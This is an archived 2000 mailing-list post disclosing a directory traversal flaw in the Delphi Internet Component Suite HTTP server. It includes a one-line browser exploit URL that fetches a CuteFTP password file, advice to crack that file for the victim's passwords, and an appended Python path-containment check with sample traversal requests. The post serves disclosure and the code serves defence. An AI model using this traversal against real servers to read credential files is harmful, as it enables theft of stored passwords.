Vulnerability Development mailing list archives
Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component]
From: webmaster () TLSECURITY NET (TLsecurity.net)
Date: Sun, 14 May 2000 14:37:55 EDT
Int_13h
http://www.TLSecurity.net

I thought I'd forward this over to the List:
http://www.TLSecurity.net

attached mail follows:

Hi,

There's a security vulnerability in the Delphi Internet Component Suite's HTTP server (http://www.rtfm.be/fpiette/indexuk.htm). These components are widely spread. The vendor has been notified of the flaw.

Vulnerability description:
The vulnerability lets a person download _any_ file on the HTTPServer's computer using a simple exploit that can be used directly from any internet browser.

Exploit:
Name: Good old dot-dot exploit...
- Set the HTTP root to 'c:\httproot' and launch the server
- Start your browser and type http://server/../Program%20Files/CuteFTP/smdata.dat

Download the file and crack it. You now have all passwords stored in the victim's CuteFTP client.

Note: CuteFTP is just a sample, it could be any program that stores passwords.

Darkstar
dark_star () altavista net
http://browse.to/Darkstar
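The containment check whose absence the post describes, as an added example that is not part of the original message and is not ICS code: it maps a request path onto the 'c:\httproot' root from the post and refuses anything that normalizes to a location outside it. The function name and the sample requests are hypothetical; Python's ntpath module is used so Windows path rules apply on any host.

```python
import ntpath
from urllib.parse import unquote

DOC_ROOT = r"c:\httproot"  # document root taken from the post


def resolve_request_path(url_path, doc_root=DOC_ROOT):
    """Map a URL path to a file under doc_root; return None if it escapes.

    Hypothetical helper for illustration, not an ICS API.
    """
    # Decode percent-escapes exactly once, before any path logic runs,
    # so %2e%2e and %5c are judged in their decoded form.
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    # Windows accepts both separators; unify them and drop leading ones
    # so the request is always treated as relative to the root.
    relative = decoded.replace("/", "\\").lstrip("\\")
    # A drive letter in the request would make join() discard the root.
    drive, _ = ntpath.splitdrive(relative)
    if drive:
        return None
    root = ntpath.normcase(ntpath.normpath(doc_root))
    # normpath collapses every ".." segment; normcase folds case because
    # Windows file names are case-insensitive.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root, relative)))
    # Compare against root plus a separator, otherwise a sibling such as
    # c:\httproot2 would pass a plain prefix test.
    if candidate != root and not candidate.startswith(root + "\\"):
        return None
    return candidate


# Constructed sample requests; the first is the URL path from the post.
SAMPLE_REQUESTS = [
    "/../Program%20Files/CuteFTP/smdata.dat",
    "/..%5C..%5Cwinnt/x",
    "/../httproot2/secret.txt",
    "/docs/../index.html",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req, "->", resolve_request_path(req))
```

A request that resolves to None would be answered with an error status instead of being opened.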